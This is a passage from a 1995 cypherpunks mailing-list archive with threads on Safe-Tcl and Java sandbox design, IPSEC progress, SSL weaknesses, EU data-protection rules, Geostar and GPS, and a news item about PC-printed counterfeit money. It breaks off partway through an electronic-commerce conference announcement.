LHcnuuNbm2j/5zFRHtX6T6IgL6j7uqaZ2IUhyLIF3nCqeFrHyLwQJaHhmezq1Hkz
DViNw9qqjpY=
=TQvO
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Fri, 4 Aug 95 12:17:07 PDT
To: rah@shipwright.com
Subject: PRA_fix
In-Reply-To: <v02120d01ac47c6952bb7@[199.0.65.105]>
Message-ID: <199508041911.AA13305@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   X-Sender: rah@tiac.net

   >   8-4-95. NYPaper:
   >
   >
   >   "A Contract Is Awarded To Improve Navigation."
   [snip]
   >      The geosynchronous satellite would radio a correction
   >      factor back to planes in flight, or any other user. The
   >      plane would also receive signals from the G.P.S.
   >      satellites, calculate a position, apply the correction
   >      factor and fix its location.

   This is called an active location system, and it was originally disigned by
   G.K. O'Neill (The Princeton Physics Prof., Space Studies Institute founder,
   the guy who came up with all those spiffy space-settlement ideas in the
   late seventies -- see Babylon 5 for a picture ;-) -- and the inventor of
   the mass driver, among other things), under the name of Geostar, in the
   early 1980's. It's accuracy was supposed to be 6 inches in 2 dimensions,
   and 6 feet in 3 diminsions.  The FAA didn't like it because they didn't
   invent it, the DOD hated it because they wanted to commercialize GPS and
   they didn't want anything so accurate for civilian purposes. 

Actually, I (and probably others, but I don't want to argue from the
"it is widely believed" position) feel fairly sure that the government
commercialized GPS in order to put Geostar out of business, because there's
nothing for putting a company out of business quite like the government
saying the'll spend thirty billion dollars giving the same thing away
for free.

It's interesting that they're mentioning the ATC application: O'Neill
was a private pilot and came up with the Geostar idea initially as an
improvement to the current air traffic control system.

The whole thing would have cost less than either GPS or the planned
upgrades to the current ATC system, but the government is willing to
pay an order of magnitude (or more) worth of money to get a system
they can control.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 11:12:25 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Java and Safe-TCL security
In-Reply-To: <199508041701.KAA10421@jobe.shell.portal.com>
Message-ID: <199508041812.OAA23036@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The safe-tcl mailing list has not been active for a few months.  I think
> a lot of interest has transferred to Java.  One problem is that safe-tcl
> was oriented around email, so it lacks facilities for accessing web
> pages.
> 
> I agree with Ray that the security of safe-tcl leaves something to be
> desired.  I implemented a safe-tcl mail filter which would automatically
> run incoming mail scripts which were in safe-tcl format.  This would be a
> generalization of a remailer, so that users could write scripts which
> would determine when the remailing would occur, etc.  However I ran into
> a number of problems, particularly related to persistent storage (e.g.
> disk file access).  This is a hard problem for a "safe" system to solve.

Hal,
  One of the designs I have one the drawing board is to store per-script 
persistent data in a dbm file, and allow scripts to import/export data
from/to a shared tuple-space. I would limit the data storage to 1024
bytes (to make it portable, some DBM libraries have this limit)
  Scripts could store variables via a new command added to the interpreter
like 'SafeTcl_putvar varname value', and access valuables with
'SafeTcl_getvar varname', 'SafeTcl_varlist'. Also, there would be a
'SafeTcl_read_variables' which could be executed at the beginning of
the script to reload all stored variables. 
  Scripts could talk to other scripts by means of a 

	SafeTcl_export -value value scriptname1 scriptname2 ...
 
  The other script(s) could check for any incoming imports and use 
SafeTcl_import to retrieve the value. (when the last import is done,
the data is garbage collected. Also, there would be a timestamp so that
old data would be purged after a time limit anyway)


   An example might be, a calendar application in your mailbox which maintains
your weekly schedule. An incoming message script (agent), could "export"
some data to this calendar script which would correspond to some command.
For instance, asking if you would like to have dinner at a certain time.
If the calendar agent says yes, it could send a reply agent to inform
your calendar. 

  The calendar could be programmed to wakeup every so often and check for
imports, or the interpreter could just be made to "wakeup" any script
that got an import immediately. 

  Telescript's checkpointing of execution state is of course, much cleaner.
Too bad they don't know how to market a programming language.

  If anyone writes an enabled-mail java runtime, the same things could be
done a lot easier. 

  The problem with all safe "agent" designs is that the programming language
itself isn't enough. There needs to be a meta-agent language for 
querying capabilities of local environments.

-Ray
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 4 Aug 95 11:20:20 PDT
To: cypherpunks@toad.com
Subject: IPng6, SWIPE, ssh, etc.
Message-ID: <m0seRLR-0009yuC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I would like some summary opinions of the state of various efforts to
enable full IP encryption.  I'm looking for progress reports and hints
as to which technologies are the closest to being implementable.

After playing with ssh, I've been thinking of what it would take to
start migrating certain links to full encryption, possibly using a
VPN-like arrangement.

I'm interested in hacking Linux, loopback userspace drivers for other Unix's,
and thinking about what would need to be done for MS-BLECH.  Of course,
firewall like conversion of IP<->IPng6 would be great.

Of course now that Linux has IP aliasing, IP masquerading (partial I think),
ipfw, and IP over IP tunneling, it has much of what it needs.  I'm just
considering development and migration paths.


I haven't kept up on IPng6 docs, so succinct pointers would be helpful.

One interesting tact might be to start running a dual IPng6/IP stack
where it learns to tunnel packets over a well-known IP udp/tcp link
if an address doesn't respond to IPng6.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 11:40:35 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: EU Data Protection
In-Reply-To: <199508041742.NAA21367@panix.com>
Message-ID: <199508041840.OAA01729@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Just more evidence for why even "well meaning" policywonks are dangerous.
Take for instance the rule that "data must be kept up to date and accurate"
How up to date and what is accuracy? So if I have a commercial web page
which records transactions on my server, and I stop logging and keep
year old records, do some statistic processing on them, I am in
violation for having stale data. 
  And what the hell is "accurate" data? All information about other people is 
subjective. I should be entitled to record any statistics about you for my 
use that I want. Just by interacting with me you transmit information. If
I interact with you and get the "wrong impression" about what type of
person you are, am I in violation for storing inaccurate data? (e.g. if
I write in my computerized diary "I think John Smith is a jerk.")
  How will this law affect reputation servers? If my reputation server
has what you consider a bad review of you, am I in violation?

  Privacy should be implemented via cryptography, not obscure politcal
machines which are doomed to fail and produce a black market for 
personal data anyway.

-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 4 Aug 95 07:46:45 PDT
To: liberty@gate.net
Subject: RE:NRC Panel, Law Enforcement questions
Message-ID: <9508041309.AA20627@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello Jim,

I apologize that I didn't answer immediately. I have subscribed to
several mailing lists and sometimes get some hundred mails a day.
I don't have the time to read everything and therefore I have to
select. I didn't read this thread, but I found it in my archives.

> I wonder, and perhaps my kind friend Hadmut can help me here, if there is
> an English translation of any and all Nazi-era German laws/regs regarding 
> cryptography. As I [dimly] recall, Enigma was born as a private enterprise
> and the patent was only later taken over by government and classified after
> it was offered for sale to businesses (without much luck). These laws, if
> they exist, might make for interesting reading in side-by-side comparison 
> with either Sen. Grassley's latest proposals, or with anything regarding 
> cryptography coming from our paranoid FBI director.


I fear I have to disappoint you. :-(

First of all I don't know of any english translation of such laws.
The only english translation of law I know about is the translation of our
current basic law. It might be easier to find english translations
in english or american libraries than in german libraries.

Second, I don't know whether they had a certain law about cryptography.
AFAIK Enigma was a commercial product first and was taken over by the
government. But I don't know they way they did.

Third, there was no need to have laws. I don't want to restart the
discussion, but the Nazis didn't understand laws as so important. I have
read a book about their justice some time ago. The 'idea' and the
'public feeling' was seen as more important than laws. 


But perhaps another telecommunication law may be interesting. It was
forbidden to receive foreign radio senders. If they came into the
house and the radio was tuned to foreing frequencies, you got into
serious trouble. I just don't know where to find the text of the law.

regards
Hadmut








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 12:21:15 PDT
To: cypherpunks@toad.com
Subject: Re: PC E-cash (NewsClip)
Message-ID: <v02120d01ac481ff41b9f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Secret Service Says Student Used PC To Print Money

etc.

This reminds me of something which happened to me last week in a Burger King in Chelsea(MA), where the skipper now keeps the boat I grind winches on. I'm paying for my lunch and the cashier takes out a felt-tip pen and puts a little mark on my $10 bill.  She tells me that if the pen-stroke turns yellow instead of the black one she got with mine, the bill is counterfeit.  She told me she got yellow mark on $10 bill once. Go figure.

So now, we have a working miniumum competitive cost of on-line digital cash verification. The amortized cost of the ink it takes to verify a piece of paper cash. What? 20 cents worth of ink? .002 cents?

More fun with numbers, 
Bob Hettinga

P.S. We just put in 12 volt power for the Mac. I also bought an inverter. 
     Banana daquiris on the hook. Raise the cocktail flag!


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 4 Aug 95 01:03:23 PDT
To: Alex Tang <altitude@cic.net>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508040455.AAA18486@petrified.cic.net>
Message-ID: <Pine.LNX.3.91.950804145626.10023E@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Aug 1995, Alex Tang wrote:

> 
> just wondering but...What are the intrinsic points of weakness?  

Perry Metzger and Mark Chen have recently expressed some criticism, and
Adam Shostack, around the end of May, posted a review that hilighted a 
number of potential problem areas.

Personally, I especially dislike the use of RC4-40 (yes, other algorithms 
are supported, but not using the export version of Netscape Navigator); 
the excessively large portion of the handshaking data exchanged as 
cleartext; and the limitations in certificate management (no provisions 
for verifying the revocation status with a CA).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 4 Aug 95 07:20:07 PDT
To: tcmay@sensemedia.net
Subject: Re: RSA has been proved correct
Message-ID: <9508041418.AA21187@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Mmmh,

correctness does not mean "it's a nice thing". It just
means that something fulfills the specs.

Do you know which specs were fed into the prover?

The specs could be as weak as

  -  RSA must terminate if fed with the number 42

  -  x ^ (e * d) = x  mod n   for all x from 0..(n-1)


Hadmut


  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 4 Aug 95 16:37:13 PDT
To: cypherpunks@toad.com
Subject: Re: Java and Safe-TCL security
Message-ID: <199508042336.QAA15267@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ray Cromwell <rjc@clark.net>
> Hal,
>   One of the designs I have one the drawing board is to store per-script 
> persistent data in a dbm file, and allow scripts to import/export data
> from/to a shared tuple-space. I would limit the data storage to 1024
> bytes (to make it portable, some DBM libraries have this limit)
>   Scripts could store variables via a new command added to the interpreter
> like 'SafeTcl_putvar varname value', and access valuables with
> 'SafeTcl_getvar varname', 'SafeTcl_varlist'. Also, there would be a
> 'SafeTcl_read_variables' which could be executed at the beginning of
> the script to reload all stored variables. 
>   Scripts could talk to other scripts by means of a 
> 
> 	SafeTcl_export -value value scriptname1 scriptname2 ...
>  
>   The other script(s) could check for any incoming imports and use 
> SafeTcl_import to retrieve the value. (when the last import is done,
> the data is garbage collected. Also, there would be a timestamp so that
> old data would be purged after a time limit anyway)

This sounds like an interesting approach.  I hear that Telescript uses a
remote procedure call concept for inter-script communication.  So one
script gets to call the public methods of another script.  I don't know
how it finds out what other scripts are arround for it to talk to,
though, or decides whether they have anything of interest.

The tuple space idea sounds good and is not too dissimmilar from the
get/setconfigdata in safe-tcl.  There are some problems about security
though.  Who gets to delete tuples?  How do you prevent a malicious
script from messing up the data?  Maybe it depends on the application,
what you want to use this data for.

BTW what kinds of facilities are there in Java for scripts to have access
to disk files?  I know there was some discussion of using scripts for
cryptography.  Presumably the user would want to give "read only" access
to the (public) keys he used.

And how about other forms of I/O, email and the like?  Can Java scripts
do this?  What are the restrictions to prevent abuse?  Safe-tcl has a
concept where a script can send mail, but the implementation pops up a
window and asks the user first if it is OK to send.  (Unfortunately that
doesn't work for a telescript like application where there is no user
around to vet the messages.)

>   The problem with all safe "agent" designs is that the programming language
> itself isn't enough. There needs to be a meta-agent language for 
> querying capabilities of local environments.

Yes, there was some discussion about this on the safe-tcl list.  There is
also an agents list I was on for a while but they couldn't even agree
about what an agent was so not much progress happened there!  There have
been various proposals for standard ways agent scripts could specify what
capabilities they need to run, etc.  Doing web searches on "agents" will
track a lot of these down.  However most seem concerned with traditional
issues like compute cycles, memory usage, etc., and not with the more
difficult and important issues of knowing whether there is another agent
there (or a local database) which has the specific information my agent
is after.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Fri, 4 Aug 95 10:23:52 PDT
To: cypherpunks@toad.com
Subject: Re: EU Data Protection
Message-ID: <199508041723.AA07790@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 03 Aug 1995 13:25:25 -0400
> To:            cypherpunks@toad.com
> From:          Duncan Frissell <frissell@panix.com>
> Subject:       EU Data Protection

> Could I bother the members of this list with a request that anyone who has a
> copy of (this week's or a recent) Computerworld, look and see if I'm quoted
> in an article by Mitch Betts on the European Union's humorous decree on
> Euro-wide data protection.  I was interviewed last Thursday.  The decree
> (July 24th) threatens to cut off data flows to any nation that doesn't adopt
> Eurosclerotic data protection standards.  

Excuse me - what the f**k is this?  Does it bear some truth in it
or is it just a bad joke? If it is not a joke where to get the damn
text - thanks. Sorry for the language but this does  sound just
the thing I have heard some rumours of and which certainly
would result in banning strong crypto.

Regards
Kari


Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 4 Aug 95 14:14:33 PDT
To: perry@piermont.com
Subject: Re:  Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
Message-ID: <9508042112.AA24506@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>the interpreter is made "safe" is to take a fully working tcl interpreter
>(with full priveleges) at run time, and use TclDeleteCommand() to remove
>offending commands. Safe-TCL is not emasculated at compile time, but at
>run time.

I have been told by folks at Sun that they are planning on doing it at
compile-time as well as at run-time.  One of the concerns I conveyed
was that I want to make it easy to "pull out" the safe code and give
it a security audit.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 4 Aug 95 14:17:27 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  Java and Safe-TCL security
Message-ID: <9508042117.AA24546@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>One problem is that safe-tcl
>was oriented around email, so it lacks facilities for accessing web
>pages.

No, it's just that the people who took it over^H^H^H^Hand ran with it
were most interested in email.  My initial motivation was that I wanted
to write a new news server that clients could download programs to.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 4 Aug 95 14:38:53 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <m0seRLR-0009yuC@sdwsys>
Message-ID: <199508042138.RAA05009@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams writes:
> I would like some summary opinions of the state of various efforts to
> enable full IP encryption.  I'm looking for progress reports and hints
> as to which technologies are the closest to being implementable.

The implementation efforts are in full swing. At the last IETF meeting
in Stockholm, Steve Crocker challenged the community to have IPSEC in
place and available in time for the Dallas meeting in December. There
is now a mailing list for those actively working on the implementation
efforts and a good deal of effort is being expended. In fact, I took
off this month more or less so that I could work full time on
implementation.

> I haven't kept up on IPng6 docs, so succinct pointers would be helpful.

The actual RFCs were submitted to the RFC editor over the last day or
so, so there should be real RFCs to quote shortly. However, for the
moment, check out draft-ietf-ipsec-* in the nearest internet-drafts
depository. ds.internic.net:/internet-drafts/ is probably a reasonable
spot.

> One interesting tact might be to start running a dual IPng6/IP stack
> where it learns to tunnel packets over a well-known IP udp/tcp link
> if an address doesn't respond to IPng6.

You don't need to use IPv6 for the security, by the way -- its defined
to work on either. If you want, of course, I'm sure the v6 folks would
love a Linux v6 stack to show up soon...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Fri, 4 Aug 95 15:48:23 PDT
To: rjc@clark.net
Subject: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
In-Reply-To: <199508042152.RAA12471@clark.net>
Message-ID: <199508042243.AA08602@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ray Cromwell <rjc@clark.net>
   Date: Fri, 4 Aug 1995 17:52:24 -0400 (EDT)

     SafeTcl or Java? I wish SafeTcl was isolated into a separate library
   with compiled-in safety so I could embed it into my applications. As it is
   now, I have to just use normal Tcl and hack in the MakeInterpreterSafe()
   function which removes dangerous commands.

   -Ray

You mean the "dangerous" commands can't just be left out of the proper
place in the makefile or something?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 14:52:48 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
In-Reply-To: <9508042112.AA24506@sulphur.osf.org>
Message-ID: <199508042152.RAA12471@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >the interpreter is made "safe" is to take a fully working tcl interpreter
> >(with full priveleges) at run time, and use TclDeleteCommand() to remove
> >offending commands. Safe-TCL is not emasculated at compile time, but at
> >run time.
> 
> I have been told by folks at Sun that they are planning on doing it at
> compile-time as well as at run-time.  One of the concerns I conveyed
> was that I want to make it easy to "pull out" the safe code and give
> it a security audit.

  SafeTcl or Java? I wish SafeTcl was isolated into a separate library
with compiled-in safety so I could embed it into my applications. As it is
now, I have to just use normal Tcl and hack in the MakeInterpreterSafe()
function which removes dangerous commands.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 4 Aug 95 18:35:43 PDT
To: chris@deltacom.mindspring.com (Christopher Smith)
Subject: Re: Quicken's new version
In-Reply-To: <Pine.LNX.3.91.950728084231.1957A-100000@deltacom.mindspring.com>
Message-ID: <9508050133.AA13495@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Christopher,

> If I am out of place for posting here, forgive me; however, I do
> believe this germane.  Compass Bank here in Alabama is joining
> twenty other banks around the country to offer dial-in banking via
> Quicken's new software release.  Does anyone know or have heard of
> the security mechanisms which are to be built in to this product,
> specifically authent and encryption?

I'm Intuit's security architect, and I'd love to talk to you about
this.  Unfortunately, we'll have to wait until my boss decides to make
an architecture announcement.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 4 Aug 95 01:50:54 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <Pine.LNX.3.91.950804145626.10023E@ima.net>
Message-ID: <Pine.SOL.3.91.950804184517.4116A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Aug 1995, Enzo Michelangeli wrote:
> On Fri, 4 Aug 1995, Alex Tang wrote:
> Perry Metzger and Mark Chen have recently expressed some criticism, and
> Adam Shostack, around the end of May, posted a review that hilighted a 
> number of potential problem areas.

Do you have a copy of this?

> Personally, I especially dislike the use of RC4-40 (yes, other algorithms 
> are supported, but not using the export version of Netscape Navigator); 
Totaly agree, hell, I going to give the option for users and server to 
specify at run time which ciphers never to use :-).

> the excessively large portion of the handshaking data exchanged as 
> cleartext; and the limitations in certificate management (no provisions 
> for verifying the revocation status with a CA).

The clear text I don't like, I agree.  But then when used for http, 
everything begins with a GET anyway.  The CRL verification is again to me 
a matter of implementation.  Currently my library does not support CRL 
(but I can load and manipulate them).  It is simply a function of the 
infrastructure to go with the library.  SSL v3 of the spec does alow for 
CRL to be passed along with the certificate heigherachy (a PKCS-7 object).

I'm mostly concered with any objections raised with the protocol, not the 
particular implementation around right now.  With my library I fully 
intend to make it possible to refuse to authenticate the server unless a 
current CRL is present.

Anyway, I'm intersted in hearing people complains so I can attempt to 
make sure none of the fixable problems are in my library :-)

eric

--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 4 Aug 95 17:53:14 PDT
To: CYPHERPUNKS@toad.com
Subject: "The Net"
Message-ID: <8AE8485.00030002C7.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> logic, especially the notion that one can be "vanished" by having computer
TC> records changed--I can believe that such changes would screw things up, but
TC> surely even the character played by Sandra Bullock (nicely) would have
TC> human friends and associates to vouch for her.

  I would have thought so, too. But recently, my boss's sister-in-law
tried to get a Kansas drivers' license. She had allowed her Missouri
license to lapse before she moved, and some glitch in the MO computer
left her as a non-person. Now, in order to get the new license, she will
need a photo ID (and her expired "foreign" license doesn't cut it,
althought if it were a KS license, it would.)

  The burrocraps at the DMV won't accept any "vouching" whatsoever.



 * A man's house is his hassle.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 4 Aug 95 04:31:05 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <Pine.SOL.3.91.950804184517.4116A-100000@orb>
Message-ID: <Pine.LNX.3.91.950804190117.11525A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Aug 1995, Eric Young wrote:

> Do you have a copy of this?

Yes, I've forwarded it to you separately.

> The clear text I don't like, I agree.  But then when used for http, 
> everything begins with a GET anyway.  

Well, ssh and Photuris shows that a better way is possible: do a D-H key 
exchange, then handle anything else (including the authentication of the 
D-H transaction) on the newly established encrypted channel.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 4 Aug 95 11:15:43 PDT
To: cypherpunks@toad.com
Subject: PC E-cash (NewsClip)
Message-ID: <199508041815.UAA27253@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Secret Service Says Student Used PC To Print Money


Lubbock, Tex., Aug. 3 -- PC graphics programs have come a
long way since their inception, but not far enough to fool
the Secret Service. That's what a Texas Tech student tried
to do when he used his personal computer to print
counterfeit money, according to Secret Service agents. 

"He really put his whole heart and soul into it," according
to Lubbock, Texas Secret Service Resident Agent David
Freriks. 

Freriks said the man is an engineering student at Texas
Tech, but told agents he plans to change his major to
computer science. The 20-year old student hasn't been
identified by name since he hasn't been formally charged
yet, according to Freriks. But officials apparently aren't
concerned that he will flee. "At this point, he's more
afraid of his dad than anything," said one agent.

Freriks said the Pakistani national, who resides in
affluent southwest Lubbock, scanned a real $50 bill into
his PC, then printed the image to an Epson inkjet color
printer. Agents said the money looked real at a distance
but up close the designs were blurred, the coloration was
faulty, and the paper was slick and didn't have a watermark
strip.

Freriks said agents are confident that all of the
approximately $3,300 that was circulated has been recovered
except for about $1,000 which he said he is sure will show
up eventually, since the quality makes it easy for bank
employees to spot. ...

Investigators seized the home computer, printer and scanner
from the student's home. They said they also found a
suitcase containing almost $260,000 in fake $50 bills. 

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Aug 95 17:51:10 PDT
To: cypherpunks@toad.com
Subject: SYN_tax
Message-ID: <199508050050.UAA07631@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-4-95. W$Japer:


   "Cyberpoliticking: Presidential Races Are Being Changed By
   Latest Technology. Internet and Other Sources Can Tailor
   Information, Sway Voters' Decisions."

      This kind of campaign foray into cyberspace is but a
      small slice of a much bigger revolution. The explosion
      of new avenues of information -- digitized,
      computerized, cabled and broadcast -- will change the
      way Americans gather the information they use in picking
      their leader next year. Campaigns are struggling to
      figure out how to cope with this static-filled world, in
      which they can use new technology in unprecedented ways
      to reach both mass audiences and ever-narrower niches of
      specific voters. For voters, the difficulty will be to
      distinguish between the information and misinformation
      inevitably mixed into the avalanche.           LYN_jrk


   "Silicon Forest: For Oregon, the Boom In High Tech Brings
   Jobs and Handwringing."

      The quest for cheap land, cheap labor and tax breaks has
      led most of the world's biggest chip makers here, more
      than $13 billion in high-tech construction is either
      under way or proposed for the 100-mile swath of rural
      landscape stretching from Portland to Eugene. But
      surprising resistance is cropping up. In May, Yamhill
      County, at the western edge of Silicon Forest, rebelled
      against Sumitomo Sitix Corp.'s demand for an $58 million
      tax break for its proposed $912 million chip plant. In
      June, several hundred people turned out to cheer
      speeches opposing plans by Hyundai Electronics America
      to build a $1.3 billion chip plant.            KIK_but


   Ev & Ad's kids: SYN_tax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 19:15:18 PDT
To: cypherpunks@toad.com
Subject: CFP - Electronic Commerce Conference
Message-ID: <v02120d00ac488486057f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Ravi Kalakota <kalakota@uts.cc.utexas.edu>
>Subject: CFP - Electronic Commerce Conference
>To: www-buyinfo@allegra.att.com
>Date: Fri, 4 Aug 1995 12:44:28 -0600 (CDT)
>Cc: kalakota@uts.cc.utexas.edu
>Mime-Version: 1.0
>
>
>
>Call for Participation:
>
>    The First International Conference on Electronic Commerce
>    -->  Conference Theme: Frontiers of Electronic Commerce  <--
>
>
>We are pleased to announce The First International Conference on
>Electronic Commerce, which will be held on Monday, October 30
>and Tuesday, October 31, 1995, at The University of Texas at
>Austin's IC2 Institute in Austin, Texas. This conference is designed
>to address research issues facing academia and industry in the age of
>electronic commerce. The conference will bring together experts in
>both academia and business to identify and develop a set of critical
>issues for research in this area. The dual goals of the conference
>include shared learning on electronic commerce practices and
>defining a research agenda which will directly address issues
>concerning companies today and position them for the challenges of
>tomorrow.
>
>If you have any questions or need more information, contact: Ravi
>Kalakota (kalakota@uts.cc.utexas.edu)
>
>or see --> http://cism.bus.utexas.edu/ravi/ecomm.html
>
>We hope you are able to attend this conference.  Registration
>information, speakers list and materials are enclosed.
>
>
>Conference Summary
>-------------------------
>As the fastest growing facet of the Internet and other component
>technologies, electronic commerce offers functionality and new
>ways of doing business that no company can afford to ignore. The
>basis for moving to an electronic commerce is a belief that electronic
>markets have the potential to be more efficient in developing new
>information-based goods and services, finding global customers and
>trading partners to conduct business. Electronic commerce via the
>Internet or the next generation network infrastructure -- Information
>Superhighway -- will change business institutions, operations and
>products/services as we know today, just as the telephone, TV, fax,
>e-mail and EDI changed the way businesses and consumers
>communicate.
>
>This conference is aimed at pushing and provoking electronic
>commerce research and practice to "go where no firm has ever
>ventured before." We expect electronic commerce to obsolete much
>of the accumulated research in business. Instead of merely
>transforming the way commerce is done today from a non-electronic
>world to an electronic platform, the new way of commerce will
>create and demand radical changes in the process, product and
>promotion to better exploit the digital platform.
>
>It is no longer sufficient for electronic commerce to be viewed as a
>path- breaking technology. Electronic commerce is already playing
>an significant role in determining the strategy of today's companies
>in providing value to external and internal customers. The challenge
>facing companies is to increase the effectiveness of electronic
>commerce activities in order to achieve superior business
>performance. As successful organizations have taken a process-
>oriented view of their businesses, they will have to re- evaluate the
>role of the electronic commerce in terms of alignment with corporate
>goals.
>
>Expanded roles for electronic commerce within the business include
>activities which support other internal business processes. Questions
>such as how this activity should be carried out, how electronic
>commerce should be integrated with other organizational units, and
>how electronic commerce technology can facilitate the goals of the
>organization turn out to be complex decisions for executives making
>these investments.
>
>Likewise, electronic commerce can become a key liaison to
>customers. These electronic commerce based organizations are
>increasingly taking on activities which expand the service offerings
